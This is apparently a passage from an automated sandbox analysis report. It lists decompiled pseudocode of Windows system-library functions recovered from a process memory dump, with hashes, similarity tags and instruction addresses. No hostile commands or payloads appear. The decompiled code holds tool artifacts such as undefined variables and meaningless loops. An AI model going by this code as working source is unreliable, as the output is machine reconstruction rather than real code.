0x0160a7ca
0x0160a7e0
0x0160a7e2
0x0160a7e4
0x01649bf2
0x00000000
0x01649bf2
0x0160a7ed
0x0160a7f2
0x0160a800
0x0160a805
0x0160a80d
0x0160a812
0x01649c08
0x01649c08
0x0160a818
0x0160a81b
0x0160a821
0x0160a824
0x00000000
0x0160a824
0x0160a7ae
0x00000000
0x0160a7ae
0x0160a73c
0x0160a73e
0x00000000

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47d278382adc8ea65cc251bc6de8a542d32ab12d5a688b1cd547543bd720f955
Instruction ID: d09bac70ac59825145fcbdd97d3440a8978f96dcfd1b02259f054f182aca688e
Opcode Fuzzy Hash: 47d278382adc8ea65cc251bc6de8a542d32ab12d5a688b1cd547543bd720f955
Instruction Fuzzy Hash: BB3198B5610201AFD726CF58DC80F7ABBF9FB98750F14495AE2168B384D770EA11CB92

Uniqueness

Uniqueness Score: -1.00%

Function 016061A0, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E016061A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E01605E50(0x15b67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E016A9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E015DF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x016061b3
0x016061b5
0x016061bd
0x016061c3
0x016061c7
0x016061d2
0x016061ff
0x016061ff
0x01606201
0x01606207
0x01606207
0x016061d4
0x016061d9
0x00000000
0x00000000
0x016061df
0x016061e2
0x00000000
0x00000000
0x016061e6
0x016061e8
0x016061ee
0x016061ee
0x016061f9
0x0164762f
0x01647632
0x01647635
0x01647639
0x01647640
0x0164766e
0x01647675
0x00000000
0x00000000
0x01647681
0x01647689
0x0164768d
0x01647691
0x01647695
0x01647699
0x016476af
0x016476b5
0x016476b7
0x016476b7
0x016476d7
0x016476dc
0x00000000
0x016476dc
0x016476a2
0x016476a9
0x01647651
0x01647653
0x01647653
0x01647656
0x01647656
0x00000000
0x01647656
0x01647644
0x01647646
0x01647648
0x01647648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 728220625803fd18315cc4fad4df4c694486bf054fb2b785957f66ac492ae2b9
Instruction ID: 0df766a2843d7b11cce1ee8a7eeb3b3f8bf7c903f7adaff1b840a6aadd4a474c
Opcode Fuzzy Hash: 728220625803fd18315cc4fad4df4c694486bf054fb2b785957f66ac492ae2b9
Instruction Fuzzy Hash: 393169716057118FE325CF1DCC40B26BBE6FB88B00F05496DE9989B392E7B0E805CB91

Uniqueness

Uniqueness Score: -1.00%

Function 015DAA16, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E015DAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x16cd360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x16c7b9c; // 0x0
					_t53 = L015F4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0161B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0161F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L015E6C59(_t53, _t51, _t58) != 0) {
							_t28 = E01605E50(0x15bc338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0160B230(_v32, _v28, 0x15bc2d8, 1,  &_v24);
								_t28 = E015DF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x015daa25
0x015daa29
0x015daa2d
0x015daa30
0x015daa37
0x015daa3c
0x01634458
0x01634458
0x01634472
0x01634474
0x01634476
0x015daa64
0x015daa74
0x0163447c
0x01634483
0x01634492
0x015daa52
0x015daa54
0x015daa5e
0x016344a8
0x016344ad
0x016344af
0x016344b6
0x016344b6
0x016344b9
0x016344bc
0x016344cd
0x016344d3
0x016344d6
0x016344e1
0x016344e1
0x016344e6
0x016344e8
0x016344fb
0x016344fb
0x016344e8
0x00000000
0x015daa5e
0x01634476
0x015daa42
0x015daa46
0x015daa48
0x015daa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ca4394b4a427e863eaa8832769bb7911b2943a8a5a7573eb121b80ad46063bc
Instruction ID: 739c071ae88191fb41deca1ff525466db52c488bbc0ed50d69e81c52c967c63d
Opcode Fuzzy Hash: 0ca4394b4a427e863eaa8832769bb7911b2943a8a5a7573eb121b80ad46063bc
Instruction Fuzzy Hash: 8431D171A0021AABCB259F68CD81ABFB7B9FF94700B054469F905EB240EB749911CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01614A2C, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E01614A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x16cd360 ^ _t62;
				_v8 =  *0x16cd360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E015F2280(_t26, 0x16c8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E015EFFB0(_t41, _t51, 0x16c8608);
						L2:
						 *0x16cb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0161B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E015F2280(_t28, 0x16c8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E015EFFB0(_t42, _t53, 0x16c8608);
							if(_t53 != 0) {
								L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E015EFFB0(_t41, _t51, 0x16c8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x01614a2c
0x01614a34
0x01614a3c
0x01614a3e
0x01614a48
0x01614a4b
0x01614a4d
0x01614a51
0x01614a9c
0x00000000
0x00000000
0x01614aa3
0x01614aa8
0x01614aad
0x01614ab1
0x01614ade
0x01614ae3
0x01614a5a
0x01614a62
0x01614a6a
0x01614a6e
0x0164f203
0x01614a84
0x01614a88
0x01614a89
0x01614a8a
0x01614a95
0x01614a95
0x01614a79
0x01614a80
0x01614af2
0x01614af4
0x01614af9
0x01614aff
0x01614b01
0x01614b03
0x01614b08
0x0164f20a
0x0164f212
0x0164f216
0x0164f216
0x01614b08
0x01614b13
0x01614b1a
0x0164f229
0x0164f229
0x01614b1a
0x01614a82
0x00000000
0x01614a82
0x01614ab7
0x01614acd
0x01614acd
0x01614ad5
0x01614ada
0x00000000
0x01614ada
0x01614ac2
0x01614acb
0x00000000
0x00000000
0x00000000
0x01614acb
0x01614a53
0x01614a53
0x01614a58
0x00000000

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab7fe93768b084a11cf2bdecb3e161dea3ddd128e46640b8cf3355b207eac1b3
Instruction ID: 98c0324c3873917902358d20b03ac98b2be8d55c4fcb05d9f55c5e048ba509fa
Opcode Fuzzy Hash: ab7fe93768b084a11cf2bdecb3e161dea3ddd128e46640b8cf3355b207eac1b3
Instruction Fuzzy Hash: 3D31CF322052A29BC7319F59CD44B2ABBA5FBC5B10F0A456DE9664B749CF70D801CB89

Uniqueness

Uniqueness Score: -1.00%

Function 01618EC7, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E01618EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x16cd360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E01604E70(0x16c86e4, 0x1619490, 0, 0);
					if( *0x16c53e8 > 5 && E01618F33(0x16c53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x16c53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x16c53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x15bbc46;
						_t48 = E01657B9C(0x16c53e8, 0x15bbc46, _t67, 0x16c53e8, _t70,  &_v140);
					}
				}
				return E0161B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x01618ec7
0x01618ed9
0x01618edc
0x01618ee6
0x01618ee9
0x01618eee
0x01618efc
0x01618f08
0x01651349
0x01651353
0x0165135d
0x01651366
0x0165136f
0x01651375
0x0165137c
0x01651385
0x01651390
0x01651391
0x0165139c
0x0165139d
0x016513a6
0x016513ac
0x016513b2
0x016513b5
0x016513bc
0x016513bf
0x016513c2
0x016513c5
0x016513c8
0x016513cb
0x016513ce
0x016513d1
0x016513d4
0x016513d7
0x016513da
0x016513dd
0x016513e0
0x016513e3
0x016513e6
0x016513e9
0x016513f6
0x01651400
0x01651400
0x01618f08
0x01618f32

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0dcb35b5f8cce03740de53b8a6e799e48e019fd58504b38f7310fdc04374d78
Instruction ID: ee0fd1c37bcb298e885671a68dd5e7d54ff84cc223a447f4899cf40d8711480a
Opcode Fuzzy Hash: b0dcb35b5f8cce03740de53b8a6e799e48e019fd58504b38f7310fdc04374d78
Instruction Fuzzy Hash: 8941A2B1D003189FDB20CFAAD980AAEFBF9FB48710F5041AEE509A7240E7749A44CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0160E730, Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0160E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E01619670() < 0) {
					L0162DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x16c7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L015F4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0160E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x0160e730
0x0160e736
0x0160e738
0x0160e73d
0x0160e73e
0x0160e740
0x0160e749
0x0160e765
0x0160e76a
0x0160e76b
0x0160e76c
0x0160e76d
0x0160e76e
0x0160e76f
0x0160e775
0x0160e777
0x0160e77e
0x0164b675
0x0160e784
0x0160e784
0x0160e789
0x0160e7a8
0x0160e7ac
0x0160e807
0x0160e7ae
0x0160e7ae
0x0160e7b1
0x0160e7b4
0x0160e7b9
0x0160e7c0
0x0160e7c4
0x0160e7ca
0x0160e7cc
0x00000000
0x0160e7d3
0x0160e7d6
0x00000000
0x00000000
0x0160e7ff
0x0160e802
0x00000000
0x00000000
0x0160e7f9
0x0160e7fc
0x00000000
0x00000000
0x0160e7f3
0x0160e7f6
0x00000000
0x00000000
0x0160e7ed
0x0160e7f0
0x00000000
0x00000000
0x0160e7e7
0x0160e7ea
0x00000000
0x00000000
0x0164b685
0x0164b688
0x00000000
0x00000000
0x0164b682
0x00000000
0x00000000
0x0160e7cc
0x0160e7d9
0x0160e7dc
0x0160e7de
0x0160e7de
0x0160e7ac
0x0160e7e4
0x0160e74b
0x0160e751
0x0160e759
0x0160e761
0x0160e761

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13018c39955d414014231aa3793fb517d556118adbc1ae565a66e5c62339f6b4
Instruction ID: f0b8721602a9a197e97065a357c443bef7a87daba11dc8c583573c4181229c87
Opcode Fuzzy Hash: 13018c39955d414014231aa3793fb517d556118adbc1ae565a66e5c62339f6b4
Instruction Fuzzy Hash: 8B318C75A14249AFD745CF58CC41B9ABBE8FB08314F14865AFA04CB381E672E990CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0160BC2C, Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0160BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x16c6100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E015F2280(0xd, 0x71df1a0);
				_t41 =  *0x16c60f8; // 0x0
				if(_t41 != 0) {
					 *0x16c60f8 =  *_t41;
					 *0x16c60fc =  *0x16c60fc + 0xffff;
				}
				E015EFFB0(_t41, 0x800, 0x71df1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x16c60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L015F4620(0x16c6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x16c6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x0160bc36
0x0160bc42
0x0160bc45
0x0160bc4a
0x0160bd35
0x00000000
0x00000000
0x00000000
0x00000000
0x0160bc50
0x0160bc50
0x0160bc58
0x0160bc5a
0x0160bc60
0x00000000
0x00000000
0x0164a4f2
0x0164a4f6
0x00000000
0x00000000
0x00000000
0x0164a4fc
0x0160bc79
0x0160bc7e
0x0160bc86
0x0160bd16
0x0160bd20
0x0160bd20
0x0160bc8d
0x0160bc94
0x0160bcbd
0x0160bcca
0x0160bccb
0x0160bccc
0x0160bccd
0x0160bcce
0x0160bcd4
0x0160bcea
0x0160bcee
0x0160bcf2
0x0160bd00
0x0160bd04
0x00000000
0x0160bc96
0x0160bcab
0x0160bcaf
0x0160bd2c
0x0160bd2c
0x0160bd09
0x00000000
0x0160bd09
0x0160bcb1
0x0160bcb5
0x0160bcbb
0x00000000
0x00000000
0x00000000
0x0160bcbb

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01d56266f800d90df307094c12f529244e767ca1f18798284a37f920773c79c8
Instruction ID: 3bf70075fcf4c09e19feafeb28f2fdb00e3fd5edb38a8dddbfdc1847f626279a
Opcode Fuzzy Hash: 01d56266f800d90df307094c12f529244e767ca1f18798284a37f920773c79c8
Instruction Fuzzy Hash: A031F13A6006069FCB12DF58DC807A773B4FB58311F048079E905EB385E774D905CB89

Uniqueness

Uniqueness Score: -1.00%

Function 015D9100, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E015D9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x16af6e8);
				E0162D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E016A88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0162D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x16c86c0; // 0x11707b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x16c86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E015F2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E016A88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0161AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x16cb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x16c84c0;
										if(_t69 >=  *0x16c84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E016A9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E015D922A(_t82);
							_t53 = E015F7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E016A8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x16c86c0; // 0x11707b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x16c86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x16c86bc;
										_t72 = 0x16c86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E015D9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x16c86c4;
									_t72 = 0x16c86c0;
									L18:
									E01609B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x015d9100
0x015d9100
0x015d9100
0x015d9100
0x015d9102
0x015d9107
0x015d910c
0x015d9110
0x015d9115
0x015d9136
0x015d9143
0x016337e4
0x016337e4
0x015d9149
0x015d914e
0x015d914e
0x015d9117
0x015d911d
0x00000000
0x00000000
0x015d911f
0x015d9125
0x00000000
0x015d9151
0x015d9158
0x015d915d
0x015d9161
0x015d9168
0x01633715
0x00000000
0x015d916e
0x015d916e
0x015d9175
0x015d9177
0x015d917e
